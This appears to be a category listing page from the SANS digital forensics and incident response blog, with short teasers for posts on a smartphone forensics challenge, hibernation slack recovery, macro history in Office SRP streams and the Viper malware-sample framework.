SANS Digital Forensics and Incident Response Blog: Category - Computer Forensics

DFIRCON EAST Smartphone Forensics Challenge

DFIRCON EAST Smartphone Forensics Challenge: https://www.surveymonkey.com/s/Smartphone-Challenge The smartphone dataset contains Malware and an iOS backup file. The goal is to highlight application data often missed by forensic tools. Your job? Find it. The object of our challenge is simple: Download the smartphone dataset and attempt to answer the 6 questions. To successfully submit for the … Continue reading DFIRCON EAST Smartphone Forensics Challenge


Hibernation Slack: Unallocated Data from the Deep Past

Hi Folks, I was recently doing some forensic research on a laptop which had been formatted and factory-reinstalled (using the preinstalled HPA partition it shipped with), and then used normally by another user for six months prior to collection. I wasn't really expecting to be able to recover much of anything from before the format, … Continue reading Hibernation Slack: Unallocated Data from the Deep Past


Getting the most out of Smartphone Forensic Exams - SANS Advanced Smartphone Forensics Poster Release

Getting the most out of Smartphone Forensic Exams - SANS Advanced Smartphone Forensics Poster Release There is one certain thing in the DFIR field, and that is that there are far more facts, details and artifacts to remember than can easily be retained in any forensic examiner's brain. SANS has produced an incredibly helpful array … Continue reading Getting the most out of Smartphone Forensic Exams - SANS Advanced Smartphone Forensics Poster Release


SRP Streams in MS Office Documents Reveal Earlier Versions of Malicious Macros

SRP streams in Microsoft Office documents can reveal older versions of VBA macro code used by the adversary in earlier attacks. After the attacker modifies the malicious document for a new attack, Microsoft Office sometimes retains a cache of the earlier macro inside these streams, allowing analysts to expand their understanding of the incident and derive valuable threat intelligence. In other words, SRP streams can help investigators travel back in time. Continue reading SRP Streams in MS Office Documents Reveal Earlier Versions of Malicious Macros


Managing and Exploring Malware Samples with Viper

Keeping track of all the samples on your plate can become cumbersome and at times, next to impossible; that's where projects like Viper come in. Viper is "a framework to store, classify and investigate binary files." The following article, contributed by David Westcott, explains how to get started with this tool. Continue reading Managing and Exploring Malware Samples with Viper